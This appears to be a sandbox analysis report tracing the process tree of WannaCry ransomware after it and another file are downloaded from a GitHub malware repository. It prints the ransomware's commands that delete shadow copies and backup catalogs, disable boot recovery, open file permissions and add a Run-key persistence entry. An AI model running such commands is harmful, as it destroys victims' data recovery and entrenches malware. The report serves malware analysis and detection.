"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/NotReal96/Malware/blob/master/MrsMajor.md
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc3bd03cb8,0x7ffc3bd03cc8,0x7ffc3bd03cd8
  2⤵
  PID:1444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1924 /prefetch:2
  2⤵
  PID:3320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
  2⤵
  PID:1352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
  2⤵
  PID:4968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
  2⤵
  PID:1144
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4588 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1
  2⤵
  PID:3900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
  2⤵
  PID:1488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
  2⤵
  PID:2148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:1
  2⤵
  PID:1896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4000 /prefetch:8
  2⤵
  PID:3964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3280 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5632 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3424
- C:\Users\Admin\Downloads\NRVP.exe
  "C:\Users\Admin\Downloads\NRVP.exe"
  2⤵
  - Executes dropped EXE
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:1
  2⤵
  PID:4748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5656 /prefetch:8
  2⤵
  PID:4164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
  2⤵
  PID:4908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6316 /prefetch:1
  2⤵
  PID:840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
  2⤵
  PID:3092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6640 /prefetch:1
  2⤵
  PID:3148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1
  2⤵
  PID:1552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
  2⤵
  PID:2412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1
  2⤵
  PID:3028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:1
  2⤵
  PID:404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5896 /prefetch:8
  2⤵
  PID:3148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6720 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2552 /prefetch:1
  2⤵
  PID:1592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
  2⤵
  PID:3952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6484 /prefetch:1
  2⤵
  PID:4128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2504 /prefetch:1
  2⤵
  PID:5020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6864 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
  2⤵
  PID:4012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:1
  2⤵
  PID:1396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4736 /prefetch:8
  2⤵
  PID:1524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6628 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2560
- C:\Users\Admin\Downloads\NRVP (2).exe
  "C:\Users\Admin\Downloads\NRVP (2).exe"
  2⤵
  - Executes dropped EXE
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:1256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:1
  2⤵
  PID:4916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1992 /prefetch:1
  2⤵
  PID:3268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1
  2⤵
  PID:1756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6472 /prefetch:1
  2⤵
  PID:2072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6792 /prefetch:1
  2⤵
  PID:464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1688 /prefetch:1
  2⤵
  PID:4128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1636 /prefetch:1
  2⤵
  PID:4172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6168 /prefetch:1
  2⤵
  PID:4848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1
  2⤵
  PID:3728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,2323642806716243858,15092397582516240846,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3848 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:436

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3508

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4520

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3152

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\WannaCry\" -spe -an -ai#7zMap24933:76:7zEvent4225
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2888

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\WannaCry\" -spe -an -ai#7zMap7767:76:7zEvent28746
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4736

C:\Users\Admin\Downloads\WannaCry\WannaCrypt0r.exe
"C:\Users\Admin\Downloads\WannaCry\WannaCrypt0r.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:572
- C:\Windows\SysWOW64\attrib.exe
  attrib +h .
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:2776
- C:\Windows\SysWOW64\icacls.exe
  icacls . /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3404
- C:\Users\Admin\Downloads\WannaCry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 20411734900779.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4356
- - C:\Windows\SysWOW64\cscript.exe
    cscript.exe //nologo m.vbs
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1888
- C:\Windows\SysWOW64\attrib.exe
  attrib +h +s F:\$RECYCLE
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:4152
- C:\Users\Admin\Downloads\WannaCry\@[email protected]
  @[email protected] co
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5008
- - C:\Users\Admin\Downloads\WannaCry\TaskData\Tor\taskhsvc.exe
    TaskData\Tor\taskhsvc.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4840
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /b @[email protected] vs
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4660
- - C:\Users\Admin\Downloads\WannaCry\@[email protected]
    @[email protected] vs
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:872
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      4⤵
      System Location Discovery: System Language Discovery
      PID:1284
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3920
- C:\Users\Admin\Downloads\WannaCry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1672
- C:\Users\Admin\Downloads\WannaCry\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:952
- C:\Users\Admin\Downloads\WannaCry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:2728
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "bgesnwjhsz761" /t REG_SZ /d "\"C:\Users\Admin\Downloads\WannaCry\tasksche.exe\"" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4544
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "bgesnwjhsz761" /t REG_SZ /d "\"C:\Users\Admin\Downloads\WannaCry\tasksche.exe\"" /f
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:3820
- C:\Users\Admin\Downloads\WannaCry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1144
- C:\Users\Admin\Downloads\WannaCry\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2560
- C:\Users\Admin\Downloads\WannaCry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3152
- C:\Users\Admin\Downloads\WannaCry\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4784
- C:\Users\Admin\Downloads\WannaCry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4576
- C:\Users\Admin\Downloads\WannaCry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1536
- C:\Users\Admin\Downloads\WannaCry\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4512
- C:\Users\Admin\Downloads\WannaCry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4208
- C:\Users\Admin\Downloads\WannaCry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3636
- C:\Users\Admin\Downloads\WannaCry\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:2616
- C:\Users\Admin\Downloads\WannaCry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4876
- C:\Users\Admin\Downloads\WannaCry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2328
- C:\Users\Admin\Downloads\WannaCry\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry\@[email protected]
  2⤵
  - Executes dropped EXE
